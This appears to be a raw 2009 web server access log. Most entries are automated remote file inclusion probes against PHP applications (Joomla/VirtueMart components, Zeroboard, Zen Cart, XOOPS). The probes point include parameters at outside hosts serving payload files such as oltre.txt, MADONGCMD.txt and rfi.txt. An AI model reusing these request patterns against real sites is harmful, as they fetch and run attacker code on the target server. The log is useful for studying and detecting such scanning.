89.111.184.103 - - [26/Apr/2009:22:18:55 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:18:55 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
202.111.175.179 - - [26/Apr/2009:22:23:22 -0500] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
202.111.175.179 - - [26/Apr/2009:22:23:24 -0500] "GET //ray/modules/global/inc/header.inc.php?sIncPath=http://www.landran.ca/image/sistem.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:22:23:44 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:22:23:44 -0500] "GET //guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
121.78.70.9 - - [26/Apr/2009:22:23:58 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 298 "-""libwww-perl/5.53"
121.78.70.9 - - [26/Apr/2009:22:23:59 -0500] "GET //guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 293 "-""libwww-perl/5.53"
74.55.30.194 - - [26/Apr/2009:22:27:47 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:22:27:47 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.55.30.194 - - [26/Apr/2009:22:27:47 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
89.111.184.103 - - [26/Apr/2009:22:29:25 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:29:25 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:30:08 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:30:09 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:32:07 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:32:08 -0500] "GET //guestbook1//admin.php?include_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
208.64.202.134 - - [26/Apr/2009:22:34:28 -0500] "GET //?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
208.64.202.134 - - [26/Apr/2009:22:34:28 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
208.64.202.134 - - [26/Apr/2009:22:34:28 -0500] "GET /logs//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
65.55.106.228 - - [26/Apr/2009:22:35:49 -0500] "GET /logs/access_log.1159315200 HTTP/1.0" 200 657 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.17 - - [26/Apr/2009:22:35:50 -0500] "GET //appserv/main.php?appserv_root=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:22:35:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
208.64.202.134 - - [26/Apr/2009:22:37:53 -0500] "GET /logs/access_log.1237420800//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.111.184.103 - - [26/Apr/2009:22:38:06 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.184.103 - - [26/Apr/2009:22:38:06 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
88.84.128.40 - - [26/Apr/2009:22:41:14 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
88.84.128.40 - - [26/Apr/2009:22:41:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
77.221.130.6 - - [26/Apr/2009:22:43:49 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:43:50 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
217.147.30.80 - - [26/Apr/2009:22:45:26 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.147.30.80 - - [26/Apr/2009:22:45:27 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
217.147.30.80 - - [26/Apr/2009:22:45:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
217.147.30.80 - - [26/Apr/2009:22:45:30 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.103.16.43 - - [26/Apr/2009:22:50:42 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:22:50:42 -0500] "GET //?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:22:50:45 -0500] "GET /logs//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
76.9.3.38 - - [26/Apr/2009:22:51:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
76.9.3.38 - - [26/Apr/2009:22:51:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
76.9.3.38 - - [26/Apr/2009:22:51:33 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.1st-sniper-corps.com/files/baner.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:22:53:49 -0500] "GET /logs/access_log.1237420800//?path%5Bdocroot%5D=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
202.53.250.98 - - [26/Apr/2009:22:55:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.53.250.98 - - [26/Apr/2009:22:55:18 -0500] "GET //include/admin.lib.inc.php?site_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:56:08 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.6 - - [26/Apr/2009:22:56:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
88.84.128.40 - - [26/Apr/2009:22:56:39 -0500] "GET /logs/errors.php?error=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.84.128.40 - - [26/Apr/2009:22:56:39 -0500] "GET /errors.php?error=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.172.186.250 - - [26/Apr/2009:22:58:52 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.172.186.250 - - [26/Apr/2009:22:58:52 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.172.186.250 - - [26/Apr/2009:22:58:52 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
77.221.130.5 - - [26/Apr/2009:22:59:11 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.5 - - [26/Apr/2009:22:59:11 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.172.186.250 - - [26/Apr/2009:22:59:13 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.106.235 - - [26/Apr/2009:23:01:09 -0500] "GET /logs/access_log.1192838400 HTTP/1.0" 200 7888 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.210.208.136 - - [26/Apr/2009:23:01:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.210.208.136 - - [26/Apr/2009:23:01:54 -0500] "GET //include/lib.inc.php?site_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.210.208.136 - - [26/Apr/2009:23:01:54 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.210.208.136 - - [26/Apr/2009:23:01:58 -0500] "GET /logs/access_log.1233878400//include/lib.inc.php?site_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.165.73.157 - - [26/Apr/2009:23:05:34 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.165.73.157 - - [26/Apr/2009:23:05:34 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.165.73.157 - - [26/Apr/2009:23:05:34 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:05 -0500] "GET //include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:07 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:07 -0500] "GET //include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:10 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:10 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:10 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:31 -0500] "GET /logs/access_log.1233878400//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:09:33 -0500] "GET /logs/access_log.1233878400//include/lib.inc.php?site_path=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:12:40 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:12:40 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:12:40 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
195.137.160.91 - - [26/Apr/2009:23:14:58 -0500] "GET //skin/zero_vote/login.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.137.160.91 - - [26/Apr/2009:23:14:58 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
195.137.160.91 - - [26/Apr/2009:23:14:58 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/login.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.137.160.91 - - [26/Apr/2009:23:15:10 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/login.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.53.250.22 - - [26/Apr/2009:23:16:26 -0500] "GET /logs/errors.php?error=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
202.53.250.22 - - [26/Apr/2009:23:16:33 -0500] "GET /errors.php?error=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.147.30.80 - - [26/Apr/2009:23:20:46 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:20:48 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:20:48 -0500] "GET /logs/access_log.1238371200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:22:13 -0500] "GET /logs/access_log.1236384000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
200.103.16.43 - - [26/Apr/2009:23:24:04 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:23:24:05 -0500] "GET //include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:23:24:10 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.103.16.43 - - [26/Apr/2009:23:24:11 -0500] "GET //include/lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
217.147.30.80 - - [26/Apr/2009:23:25:33 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:25:33 -0500] "GET /logs/access_log.1238371200//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:25:35 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.147.30.80 - - [26/Apr/2009:23:27:09 -0500] "GET /logs/access_log.1236384000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.universalenglish.com/bbs//skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:30:23 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:30:23 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:30:24 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.5 - - [26/Apr/2009:23:31:52 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.5 - - [26/Apr/2009:23:31:52 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.bellangora.fr/id.txt??%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.111.175.179 - - [26/Apr/2009:23:32:09 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:32:09 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:32:10 -0500] "GET /logs/access_log.1239235200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
202.111.175.179 - - [26/Apr/2009:23:32:10 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.landran.ca/image/FX29ID1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:32:21 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:32:21 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:32:30 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:32:30 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
206.104.21.154 - - [26/Apr/2009:23:36:36 -0500] "GET /modify.php?dir_module=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:23:36:36 -0500] "GET /logs/access_log.1237939200/modify.php?dir_module=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:23:36:36 -0500] "GET /logs/modify.php?dir_module=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.104.21.154 - - [26/Apr/2009:23:37:00 -0500] "GET /logs/access_log.1237248000/modify.php?dir_module=http://www.mjswimgear.dk/joomla/administrator/modules/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [26/Apr/2009:23:38:34 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.173.130.41 - - [26/Apr/2009:23:38:35 -0500] "GET //?_PHPLIB[libdir]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.173.130.41 - - [26/Apr/2009:23:38:36 -0500] "GET /logs//?_PHPLIB[libdir]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 187156 "-""Mozilla/5.0"
189.126.116.39 - - [26/Apr/2009:23:39:23 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://yakuza41.t35.com/pixid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
189.126.116.39 - - [26/Apr/2009:23:39:23 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://yakuza41.t35.com/pixid.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
77.221.130.17 - - [26/Apr/2009:23:39:27 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.17 - - [26/Apr/2009:23:39:27 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://radioactivecrew.net/alat/yes.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.185.20.88 - - [26/Apr/2009:23:40:40 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:40 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:45 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:46 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:46 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:46 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:40:47 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.koeln-ks.de/temp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.185.20.88 - - [26/Apr/2009:23:41:48 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:41:48 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:43:03 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.185.20.88 - - [26/Apr/2009:23:43:03 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.koeln-ks.de/temp/rfi.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
65.55.208.132 - - [26/Apr/2009:23:43:44 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [26/Apr/2009:23:43:45 -0500] "GET /logs/access_log.1117929600 HTTP/1.1" 200 660 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
210.179.177.167 - - [26/Apr/2009:23:46:05 -0500] "GET /logs//index.php?option=com_mambelfish&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
210.179.177.167 - - [26/Apr/2009:23:46:06 -0500] "GET //index.php?option=com_mambelfish&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
121.78.70.9 - - [26/Apr/2009:23:46:19 -0500] "GET /logs//index.php?option=com_mambelfish&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
